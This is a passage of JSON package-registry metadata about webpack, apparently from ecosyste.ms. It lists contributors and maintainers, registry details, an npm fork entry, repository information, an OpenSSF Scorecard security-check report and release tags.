ste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/node-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/node-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/node-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/node-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/node-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/node-webpack/codemeta","maintainers":[],"registry":{"name":"ubuntu-24.10","url":"https://launchpad.net/ubuntu/oracular","ecosystem":"ubuntu","default":false,"packages_count":38437,"maintainers_count":0,"namespaces_count":4,"keywords_count":1440,"github":"ubuntu","metadata":{"codename":"oracular","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":1455},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:48.028Z","updated_at":"2026-09-02T05:05:37.446Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/namespaces"}},{"id":2567860,"name":"webpack-no-postintall-fail","ecosystem":"npm","description":"Fork package to update uglifyjs-webpack-plugin dependency version from ^0.4.6 to ^1.1.6 in order to avoid npm install issues (see https://github.com/webpack-contrib/uglifyjs-webpack-plugin/issues/117)","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2018-01-07T20:04:21.816Z","latest_release_published_at":"2018-01-07T20:04:21.816Z","latest_release_number":"3.10.1","last_synced_at":"2026-09-03T00:24:26.676Z","created_at":"2022-04-10T03:38:40.809Z","updated_at":"2026-09-03T00:24:26.676Z","registry_url":"https://www.npmjs.com/package/webpack-no-postintall-fail","install_command":"npm install webpack-no-postintall-fail","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.10.1"}},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-15T12:07:17.000Z","size":95092,"stargazers_count":65979,"open_issues_count":146,"forks_count":9532,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.192Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-15T11:34:15.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685515,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl"